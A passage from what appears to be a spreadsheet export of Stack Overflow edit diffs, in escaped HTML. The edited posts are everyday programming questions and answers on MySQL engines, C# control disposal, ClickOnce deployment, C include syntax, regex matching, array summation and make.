 &lt;p&gt; I've read a bunch of stuff on the web about the differences between &lt;span class="diff-add"&gt;MyISAM&lt;/span&gt; and &lt;span class="diff-add"&gt;InnoDB&lt;/span&gt;, and &lt;span class="diff-add"&gt;MyISAM&lt;/span&gt; seems like the obvious choice to me for the particular database/tables that I'll be using for this task. From what I seem to be reading, &lt;span class="diff-add"&gt;InnoDB&lt;/span&gt; is good if transactions are needed since row level locking is supported.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anybody have any experience with this type of load (or higher)? Is &lt;span class="diff-add"&gt;MyISAM&lt;/span&gt; the way to go?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>echo_Me</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; That doesn't really cause leaks, it just makes more work for the &lt;span class="diff-delete"&gt;garbage collector&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// &lt;span class="diff-delete"&gt;Slows&lt;/span&gt; GC_x000D_
Label label = new Label();  _x000D_
this.Controls.Add(label);  _x000D_
this.Controls.Remove(label);  _x000D_
_x000D_
// &lt;span class="diff-delete"&gt;Better&lt;/span&gt;  _x000D_
Label label = new Label();  _x000D_
this.Controls.Add(label);  _x000D_
this.Controls.Remove(label);  _x000D_
label.Dispose();_x000D_
_x000D_
// &lt;span class="diff-delete"&gt;Best&lt;/span&gt;_x000D_
using( Label label = new Label() )_x000D_
{ _x000D_
    this.Controls.Add(label);  _x000D_
    this.Controls.Remove(label);  _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Leaving disposable components lying around like this is never much of a problem in a managed environment like .&lt;span class="diff-delete"&gt;NET&lt;/span&gt; - that's a big part of what managed means.&lt;/p&gt; _x000D_
 &lt;p&gt; You'll slow you &lt;span class="diff-delete"&gt;application&lt;/span&gt; down, certainly. But you won't leave a mess for anything else.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; That doesn't really cause leaks, it just makes more work for the &lt;span class="diff-add"&gt;GC&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// &lt;span class="diff-add"&gt;slows&lt;/span&gt; GC_x000D_
Label label = new Label();  _x000D_
this.Controls.Add(label);  _x000D_
this.Controls.Remove(label);  _x000D_
_x000D_
// &lt;span class="diff-add"&gt;better&lt;/span&gt;  _x000D_
Label label = new Label();  _x000D_
this.Controls.Add(label);  _x000D_
this.Controls.Remove(label);  _x000D_
label.Dispose();_x000D_
_x000D_
// &lt;span class="diff-add"&gt;best&lt;/span&gt;_x000D_
using( Label label = new Label() )_x000D_
{ _x000D_
    this.Controls.Add(label);  _x000D_
    this.Controls.Remove(label);  _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Leaving disposable components lying around like this is never much of a problem in a managed environment like .&lt;span class="diff-add"&gt;Net&lt;/span&gt; - that's a big part of what managed means.&lt;/p&gt; _x000D_
 &lt;p&gt; You'll slow you &lt;span class="diff-add"&gt;app&lt;/span&gt; down, certainly. But you won't leave a mess for anything else.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Our team develops distributed winform apps.&lt;br&gt;&lt;span class="diff-delete"&gt; We&lt;/span&gt; use ClickOnce for deployment and are very pleased with it.&lt;/p&gt; _x000D_
 &lt;p&gt; However, we've found the pain point with ClickOnce is in &lt;em&gt;creating&lt;/em&gt; the deployments.&lt;br&gt;&lt;span class="diff-delete"&gt; We&lt;/span&gt; have the standard dev/test/production environments and need to be able to create deployments for each of these that install and update separate from one another.&lt;br&gt;&lt;span class="diff-delete"&gt; Also&lt;/span&gt;, we want control over what assemblies get deployed.&lt;br&gt;&lt;span class="diff-delete"&gt; Just&lt;/span&gt; because an assembly was compiled doesn't mean we want it deployed.&lt;/p&gt; _x000D_
 &lt;p&gt; The obvious first choice for creating deployments is Visual Studio.&lt;br&gt;&lt;span class="diff-delete"&gt; However&lt;/span&gt;, VS really doesn't address the issues stated.&lt;br&gt;&lt;span class="diff-delete"&gt; The&lt;/span&gt; next in line is the SDK tool, Mage.&lt;br&gt;&lt;span class="diff-delete"&gt; Mage&lt;/span&gt; works OK but creating deployments is rather tedious and we don't want every developer having our code signing certificate and password.&lt;/p&gt; _x000D_
 &lt;p&gt; What we ended up doing was rolling our own deployment app that uses the command line version of Mage to create the ClickOnce manifest files.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm satisfied with our current solution but is seems like there would be an industry-wide, accepted approach to this problem.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Is&lt;/span&gt; there?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Our team develops distributed winform apps.&lt;span class="diff-add"&gt; We&lt;/span&gt; use ClickOnce for deployment and are very pleased with it.&lt;/p&gt; _x000D_
 &lt;p&gt; However, we've found the pain point with ClickOnce is in &lt;em&gt;creating&lt;/em&gt; the deployments.&lt;span class="diff-add"&gt; We&lt;/span&gt; have the standard dev/test/production environments and need to be able to create deployments for each of these that install and update separate from one another.&lt;span class="diff-add"&gt; Also&lt;/span&gt;, we want control over what assemblies get deployed.&lt;span class="diff-add"&gt; Just&lt;/span&gt; because an assembly was compiled doesn't mean we want it deployed.&lt;/p&gt; _x000D_
 &lt;p&gt; The obvious first choice for creating deployments is Visual Studio.&lt;span class="diff-add"&gt; However&lt;/span&gt;, VS really doesn't address the issues stated.&lt;span class="diff-add"&gt; The&lt;/span&gt; next in line is the SDK tool, Mage.&lt;span class="diff-add"&gt; Mage&lt;/span&gt; works OK but creating deployments is rather tedious and we don't want every developer having our code signing certificate and password.&lt;/p&gt; _x000D_
 &lt;p&gt; What we ended up doing was rolling our own deployment app that uses the command line version of Mage to create the ClickOnce manifest files.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm satisfied with our current solution but is seems like there would be an industry-wide, accepted approach to this problem.&lt;span class="diff-add"&gt; Is&lt;/span&gt; there?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>codeConcussion</t>
  </si>
  <si>
    <t>csharpwinphonexaml</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm developing a site in Visual Web Dev Express, and when I run/debug, I'd like to be able to set my application's document root so that I can use safer paths, like "/css/style.&lt;span class="diff-delete"&gt;css"&lt;/span&gt; instead of "css/style.css". How &lt;span class="diff-delete"&gt;can&lt;/span&gt; I accomplish this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm developing a site in Visual Web Dev Express, and when I run/debug, I'd like to be able to set my application's document root so that I can use safer paths, like "/css/style.&lt;span class="diff-add"&gt;css'&lt;/span&gt; instead of "css/style.css". How &lt;span class="diff-add"&gt;would&lt;/span&gt; I accomplish this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>luk2302</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In &lt;strong&gt;&lt;span class="diff-delete"&gt;C&lt;/span&gt;&lt;/strong&gt; and &lt;strong&gt;&lt;span class="diff-delete"&gt;C++&lt;/span&gt;&lt;/strong&gt;, what is the difference between &lt;strong&gt;&lt;span class="diff-delete"&gt;Angle Brackets&lt;/span&gt;&lt;/strong&gt; and &lt;strong&gt;&lt;span class="diff-delete"&gt;Double Quotes&lt;/span&gt;&lt;/strong&gt; in an &lt;code&gt;include&lt;/code&gt; statement, as follows?&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; Angle Brackets- &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;#include &amp;lt;filename&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; Double Quotes- &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;#include "filename"&lt;/span&gt;&lt;/code&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In &lt;span class="diff-add"&gt;the C&lt;/span&gt; and &lt;span class="diff-add"&gt;C++ programming languages&lt;/span&gt;, what is the difference between &lt;span class="diff-add"&gt;using angle brackets&lt;/span&gt; and &lt;span class="diff-add"&gt;using quotes&lt;/span&gt; in an &lt;code&gt;include&lt;/code&gt; statement, as follows?&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-add"&gt;#include &amp;lt;filename&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-add"&gt;#include "filename"&lt;/span&gt;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Anthon</t>
  </si>
  <si>
    <t>Minhas Kamal</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="default s-code-block hljs yaml"&gt;&lt;code&gt;&lt;span class="hljs-attr"&gt;J0000000: Transaction A0001401 started on 8/22/2008 9:49:29 AM J0000010: Project name:&lt;/span&gt; &lt;span class="hljs-string"&gt;E:\foo.pf&lt;/span&gt; &lt;span class="hljs-attr"&gt;J0000011: Job name: MBiek Direct Mail Test  J0000100: Machine name: DEV  J0000100: Project file:&lt;/span&gt; &lt;span class="hljs-string"&gt;E:\mbiek\foo.pf&lt;/span&gt;  &lt;span class="hljs-attr"&gt;J0000100: Template file:&lt;/span&gt; &lt;span class="hljs-string"&gt;E:\mbiek\foot.xdt&lt;/span&gt; &lt;span class="hljs-attr"&gt;J0000100: Job name: MBiek  J0000100: Output folder:&lt;/span&gt; &lt;span class="hljs-string"&gt;E:\foo\A0001401&lt;/span&gt;  &lt;span class="hljs-attr"&gt;J0000100: Temp folder:&lt;/span&gt; &lt;span class="hljs-string"&gt;E:\foo\Output\A0001401&lt;/span&gt;  &lt;span class="hljs-attr"&gt;J0000100: Document 1 - Starting document  J0005000:&lt;/span&gt; &lt;span class="hljs-string"&gt;Document&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-bullet"&gt;-&lt;/span&gt; &lt;span class="hljs-string"&gt;Text&lt;/span&gt; &lt;span class="hljs-string"&gt;overflowed&lt;/span&gt; &lt;span class="hljs-string"&gt;on&lt;/span&gt; &lt;span class="hljs-string"&gt;page&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-string"&gt;(warning)&lt;/span&gt;  &lt;span class="hljs-attr"&gt;J0000101:&lt;/span&gt; &lt;span class="hljs-string"&gt;Document&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-bullet"&gt;-&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-string"&gt;page(s)&lt;/span&gt; &lt;span class="hljs-attr"&gt;composed J0000102:&lt;/span&gt; &lt;span class="hljs-string"&gt;Document&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-bullet"&gt;-&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-string"&gt;page(s)&lt;/span&gt; &lt;span class="hljs-attr"&gt;rendered at 500 x 647 pixels  J0000100: Document 1 - Completed successfully J0000020:&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I have this gigantic ugly string and I'm tring to extract pieces from it using regex.&lt;/p&gt; _x000D_
 &lt;p&gt; In this case, I want to grab everything after "Project Name" up to the part where it says "J0000011:" (the 11 is going to be a different number every time).&lt;/p&gt; _x000D_
 &lt;p&gt; Here's the regex I've been playing with&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs less"&gt;&lt;code&gt;&lt;span class="hljs-selector-tag"&gt;Project&lt;/span&gt; &lt;span class="hljs-selector-tag"&gt;name&lt;/span&gt;:\&lt;span class="hljs-selector-tag"&gt;s&lt;/span&gt;+(.*)\&lt;span class="hljs-selector-tag"&gt;s&lt;/span&gt;+&lt;span class="hljs-selector-tag"&gt;J&lt;/span&gt;&lt;span class="hljs-selector-attr"&gt;[0-9]&lt;/span&gt;{&lt;span class="hljs-selector-tag"&gt;7&lt;/span&gt;}:_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The problem is that it doesn't stop until it hits the &lt;strong&gt;J0000020:&lt;/strong&gt; at the end.&lt;/p&gt; _x000D_
 &lt;p&gt; How do I make the regex stop at the first ocurrence of &lt;strong&gt;J[0-9]{7}&lt;/strong&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="default s-code-block hljs yaml"&gt;&lt;code&gt;&lt;span class="hljs-attr"&gt;J0000000: Transaction A0001401 started on 8/22/2008 9:49:29 AM&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-attr"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-attr"&gt; J0000010: Project name:&lt;/span&gt; &lt;span class="hljs-string"&gt;E:\foo.pf&lt;/span&gt;&lt;span class="diff-add"&gt; &lt;/span&gt; &lt;span class="hljs-attr"&gt;J0000011: Job name: MBiek Direct Mail Test  J0000100: Machine name: DEV  J0000100: Project file:&lt;/span&gt; &lt;span class="hljs-string"&gt;E:\mbiek\foo.pf&lt;/span&gt;  &lt;span class="hljs-attr"&gt;J0000100: Template file:&lt;/span&gt; &lt;span class="hljs-string"&gt;E:\mbiek\foot.xdt&lt;/span&gt;&lt;span class="diff-add"&gt; &lt;/span&gt; &lt;span class="hljs-attr"&gt;J0000100: Job name: MBiek  J0000100: Output folder:&lt;/span&gt; &lt;span class="hljs-string"&gt;E:\foo\A0001401&lt;/span&gt;  &lt;span class="hljs-attr"&gt;J0000100: Temp folder:&lt;/span&gt; &lt;span class="hljs-string"&gt;E:\foo\Output\A0001401&lt;/span&gt;  &lt;span class="hljs-attr"&gt;J0000100: Document 1 - Starting document  J0005000:&lt;/span&gt; &lt;span class="hljs-string"&gt;Document&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-bullet"&gt;-&lt;/span&gt; &lt;span class="hljs-string"&gt;Text&lt;/span&gt; &lt;span class="hljs-string"&gt;overflowed&lt;/span&gt; &lt;span class="hljs-string"&gt;on&lt;/span&gt; &lt;span class="hljs-string"&gt;page&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-string"&gt;(warning)&lt;/span&gt;  &lt;span class="hljs-attr"&gt;J0000101:&lt;/span&gt; &lt;span class="hljs-string"&gt;Document&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-bullet"&gt;-&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-string"&gt;page(s)&lt;/span&gt; &lt;span class="hljs-attr"&gt;composed&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-attr"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-attr"&gt; J0000102:&lt;/span&gt; &lt;span class="hljs-string"&gt;Document&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-bullet"&gt;-&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-string"&gt;page(s)&lt;/span&gt; &lt;span class="hljs-attr"&gt;rendered at 500 x 647 pixels  J0000100: Document 1 - Completed successfully&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-attr"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-attr"&gt; J0000020:&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I have this gigantic ugly string and I'm tring to extract pieces from it using regex.&lt;/p&gt; _x000D_
 &lt;p&gt; In this case, I want to grab everything after "Project Name" up to the part where it says "J0000011:" (the 11 is going to be a different number every time).&lt;/p&gt; _x000D_
 &lt;p&gt; Here's the regex I've been playing with&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs less"&gt;&lt;code&gt;&lt;span class="hljs-selector-tag"&gt;Project&lt;/span&gt; &lt;span class="hljs-selector-tag"&gt;name&lt;/span&gt;:\&lt;span class="hljs-selector-tag"&gt;s&lt;/span&gt;+(.*)\&lt;span class="hljs-selector-tag"&gt;s&lt;/span&gt;+&lt;span class="hljs-selector-tag"&gt;J&lt;/span&gt;&lt;span class="hljs-selector-attr"&gt;[0-9]&lt;/span&gt;{&lt;span class="hljs-selector-tag"&gt;7&lt;/span&gt;}:_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The problem is that it doesn't stop until it hits the &lt;strong&gt;J0000020:&lt;/strong&gt; at the end.&lt;/p&gt; _x000D_
 &lt;p&gt; How do I make the regex stop at the first ocurrence of &lt;strong&gt;J[0-9]{7}&lt;/strong&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mark Biek</t>
  </si>
  <si>
    <t>Jav_Rock</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am working on a function to establish the entropy of a distribution. It uses a copula, if any are familiar with that. I need to sum up the values in the array based on which dimensions are "cared about."&lt;/p&gt; _x000D_
 &lt;p&gt; Example: Consider the following &lt;span class="diff-delete"&gt;array&lt;/span&gt;...&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs sql"&gt;&lt;code&gt;Dimension &lt;span class="hljs-number"&gt;0&lt;/span&gt; (across)_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ __x000D_
&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;2&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;  Dimension &lt;span class="hljs-number"&gt;1&lt;/span&gt;_x000D_
&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;1&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;2&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;   (down)_x000D_
&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;3&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;6&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_x000D_
&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_x000D_
_x000D_
I "care about" dimension &lt;span class="hljs-number"&gt;0&lt;/span&gt; &lt;span class="hljs-keyword"&gt;only&lt;/span&gt;, &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; "don't care" about the rest (dim &lt;span class="hljs-number"&gt;1&lt;/span&gt;)._x000D_
Summing this &lt;span class="hljs-keyword"&gt;array&lt;/span&gt; &lt;span class="hljs-keyword"&gt;with&lt;/span&gt; the above specifications will_x000D_
"collapse" the "stacks" &lt;span class="hljs-keyword"&gt;of&lt;/span&gt; dimension &lt;span class="hljs-number"&gt;1&lt;/span&gt; down &lt;span class="hljs-keyword"&gt;to&lt;/span&gt; a single &lt;span class="hljs-number"&gt;4&lt;/span&gt; x &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-keyword"&gt;array&lt;/span&gt;:_x000D_
_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _x000D_
&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;1&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;3&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;2&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;8&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_x000D_
_x000D_
This can &lt;span class="hljs-keyword"&gt;then&lt;/span&gt; be summed, &lt;span class="hljs-keyword"&gt;or&lt;/span&gt; have &lt;span class="hljs-keyword"&gt;any&lt;/span&gt; operation performed._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I need to do this with an array of 'n' dimensions, which could feasibly be 20. Also, I need to be able to do this, caring about certain dimensions, and collapsing the rest. I am having an especially hard time with this because I cant visualize 20 dimensions :p . If anyone could help me set up some c/c++ code to collapse/sum, I would be very very grateful.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks in advance&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am working on a function to establish the entropy of a distribution. It uses a copula, if any are familiar with that. I need to sum up the values in the array based on which dimensions are "cared about."&lt;/p&gt; _x000D_
 &lt;p&gt; Example: Consider the following &lt;span class="diff-add"&gt;example&lt;/span&gt;...&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs sql"&gt;&lt;code&gt;Dimension &lt;span class="hljs-number"&gt;0&lt;/span&gt; (across)_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ __x000D_
&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;2&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;  Dimension &lt;span class="hljs-number"&gt;1&lt;/span&gt;_x000D_
&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;1&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;2&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;   (down)_x000D_
&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;3&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;6&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_x000D_
&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;0&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_x000D_
_x000D_
I "care about" dimension &lt;span class="hljs-number"&gt;0&lt;/span&gt; &lt;span class="hljs-keyword"&gt;only&lt;/span&gt;, &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; "don't care" about the rest (dim &lt;span class="hljs-number"&gt;1&lt;/span&gt;)._x000D_
Summing this &lt;span class="hljs-keyword"&gt;array&lt;/span&gt; &lt;span class="hljs-keyword"&gt;with&lt;/span&gt; the above specifications will_x000D_
"collapse" the "stacks" &lt;span class="hljs-keyword"&gt;of&lt;/span&gt; dimension &lt;span class="hljs-number"&gt;1&lt;/span&gt; down &lt;span class="hljs-keyword"&gt;to&lt;/span&gt; a single &lt;span class="hljs-number"&gt;4&lt;/span&gt; x &lt;span class="hljs-number"&gt;1&lt;/span&gt; &lt;span class="hljs-keyword"&gt;array&lt;/span&gt;:_x000D_
_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _x000D_
&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;1&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;3&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;2&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_ &lt;span class="hljs-number"&gt;8&lt;/span&gt; _&lt;span class="hljs-operator"&gt;|&lt;/span&gt;_x000D_
_x000D_
This can &lt;span class="hljs-keyword"&gt;then&lt;/span&gt; be summed, &lt;span class="hljs-keyword"&gt;or&lt;/span&gt; have &lt;span class="hljs-keyword"&gt;any&lt;/span&gt; operation performed._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I need to do this with an array of 'n' dimensions, which could feasibly be 20. Also, I need to be able to do this, caring about certain dimensions, and collapsing the rest. I am having an especially hard time with this because I cant visualize 20 dimensions :p . If anyone could help me set up some c/c++ code to collapse/sum, I would be very very grateful.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks in advance&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ed.</t>
  </si>
  <si>
    <t>Jeff Atwood</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; &lt;span class="diff-delete"&gt;Could&lt;/span&gt; you clarify a little bit more how it was for you, what you had to change. Maybe you could point me in the right direction by providing some links to the information you used.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt; Depending on the platform, they're quite well-written and can also be found on the &lt;span class="diff-delete"&gt;Internet&lt;/span&gt;. In the case of &lt;code&gt;make&lt;/code&gt;, I actually read the complete &lt;a href="http://www.gnu.org/software/make/manual/make.html" rel="nofollow noreferrer"&gt;documentation&lt;/a&gt; which took a few hours. Actually, I don't think this is necessary or helpful in most cases but I had a few special requirements in my first assignments under Linux that required a sophisticated makefile. After writing the makefile I gave it to an experienced colleague who did some minor tweaks and corrections. After that, I pretty much knew &lt;code&gt;make&lt;/code&gt;.&lt;/p&gt; _x000D_
